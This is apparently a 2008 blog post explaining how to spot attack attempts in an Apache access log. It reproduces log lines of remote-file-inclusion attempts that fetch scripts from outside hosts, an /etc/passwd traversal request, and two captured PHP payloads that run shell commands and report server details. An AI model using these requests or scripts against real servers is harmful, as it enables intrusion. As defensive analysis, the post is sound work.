If Your Domain is in This Post, You Might Have Been Hacked

May 26th, 2008 | by blank89 |

Any experienced admin will tell you that it is very easy to figure out which lines in an http log are hack attempts and which are not. If you don’t know, you’re about to find out. It is actually normal to find very large amounts of malicious traffic in your log file. You don’t have to worry about most of it, because it isn’t even for software you have. It may be of concern for somebody else though. In this article, I’ll show you how to find hacking attempts in your apache log file and show you some of the exploits and techniques being used.

Lets start with a basic example.


74.94.170.50 - - [10/May/2008:16:34:16 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
74.94.170.50 - - [10/May/2008:16:34:16 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
189.38.50.24 - - [10/May/2008:16:45:33 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.38.50.24 - - [10/May/2008:16:45:33 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.236.5.128 - - [10/May/2008:16:54:06 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.236.5.128 - - [10/May/2008:16:54:12 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
212.116.174.9 - - [10/May/2008:18:55:54 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
212.116.174.9 - - [10/May/2008:18:55:54 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"

Whoa! Have I been hacked?! Nope. I’m not sure what piece of software this is an exploit for, but it’s pretty nasty. It seems like the hacker is switching ip addresses every two attempts. The first address is a Comcast address, the second one resolves to php2a.digiweb.com.br (which is probably hacked), the next one is an Infinitum address. Why they tried the same two exploits several times even though they did not work the first time is beyond me. This means that anje.pt is either hacked, or they posted the exploit as an example in plain-text (a very stupid idea). Lets take a look at “www???????????????????????”.


<?

/*******************************************\
IRC.ASCNET.BIZ
http://www.asc.sh/
ALBOSS PARADISE aka ASCRIMEZ aka ASCNET aka ASC aka ALBANIAN.SECURITY.CLAN
\*******************************************/

$x16="\147\145t_\143\x75\162r\x65n\x74\137\x75\x73\x65\x72";
$x17="\x67e\164\x63\x77d";
$x18="\x67e\164e\x6ev";
$x19="\x67\145\164\150ostby\x6e\x61\x6de";
$x1a="\160hp\137\x75\156\x61\155e";
$x1b="\x70\x68\160\x76\x65\x72s\x69\157\156";
$x1c="\x73y\163\x74\x65\155";
echo "\x41\114\x42\101\x4e\x49A\074b\162\076";
$x0b = @$x1a();
$x0c = $x1c(uptime);
$x0d = $x1c(id);
$x0e = @$x17();
$x0f = $x18("SE\122\x56\x45\122\x5f\123O\106T\x57AR\x45");
$x10 = $x1b();
$x11 = $_SERVER['SERVER_NAME'];
$x12 = $x19($x13);
$x14 = $x16();
$x15 = @PHP_OS;
echo "\157s\x3a\040$x15\x3c\142r\076";
echo "\x75n\141\155\145 -\x61: $x0b\x3c\x62r>";
echo "\x75\160\164\x69\x6d\x65\x3a\x20$x0c\x3c\142\x72\x3e";
echo "\151d\x3a $x0d\x3cb\162\x3e";
echo "\160\167\x64:\040$x0e\x3c\142r\076";
echo "\x75\x73\145\162: $x14<\x62\162>";
echo "p\x68\x70v:\040$x10<b\162>";
echo "\x53\x6fft\x57\x61\162\145\x3a\040$x0f\074\142r\x3e";
echo "\x53\x65r\166\x65\x72\116\x61\155\x65:\x20$x11\x3c\x62r>";
echo "S\145\x72\x76\145r\101\x64\x64\x72\x3a\040$x12<b\x72>";
echo "\x55\116I\x54\x45\x44 \101\114\102\x41\x4eIA\116\x53\040\x61\x6b\x61 \x41\x4c\x42\x4f\x53S\040\120\x41R\101D\111\x53E<b\162>";
exit;
?>

This is a nasty exploit from a group that got their account suspended on their shared host server. It looks like works by exploiting a code insertion vulnerability in some php program. It then executes some shellcode. This is a reasonably advanced exploit to write, but it probably only works in older versions of php. This guy seems to have a video of his botnet on youtube, so it would be safe to assume this was an attempt to make his botnet bigger.


80.93.56.80 - - [12/May/2008:09:03:47 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://root.fileave.com/on.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
80.93.56.80 - - [12/May/2008:09:11:46 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://root.fileave.com/on.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
68.165.216.146 - - [12/May/2008:09:48:37 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://www.geocities.com/menantikan_dirimu/aid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810"
216.7.32.9 - - [12/May/2008:10:50:17 -0700] "GET /index.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 200 29227 "-" "Microsoft Pocket Internet Explorer/0.6"
216.7.32.9 - - [12/May/2008:10:54:16 -0700] "GET /string/../../../../../../../../etc/passwd HTTP/1.1" 400 - "-" "Microsoft Pocket Internet Explorer/0.6"

Hmm… Let’s take a look at “aid.txt????”.


<?
echo "31337<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = $_SERVER['SERVER_ADDR'];
$os = @PHP_OS;
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "SoftWare: $alb5<br>";
echo "PHPV: $alb6<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
$free = disk_free_space($alb4);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free: ".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
?>

It’s our friend, ALBOSS PARADISE, again. This exploit is pretty simple. It looks for a php function to the shell (like system, passthru or exec) and forwards it to him and his botnet. It injects itself in the same way the last one did (except it’s a different exploit, same mechanism).

To conclude, the files used to execute these exploits also came from:

thoseguysfilms.com, marsbook.co.kr, unduetretoccaate.it, elettrodataservice.it, sans-packing.ru, pattibus.it, unduetretoccaate.it, winbd.net, pattibus.it, northfans.ch, channelnewsperu.com, municipioxii.it, honamfishing.co.kr, i-promo.info, fileave.com, homert.100webspace.net, kaizo.hut2.ru, lcs.cornu.lyc14.ac-caen.fr and gooteo.com

If your name is on that list, you’ve probably been hacked.

Happy Patching!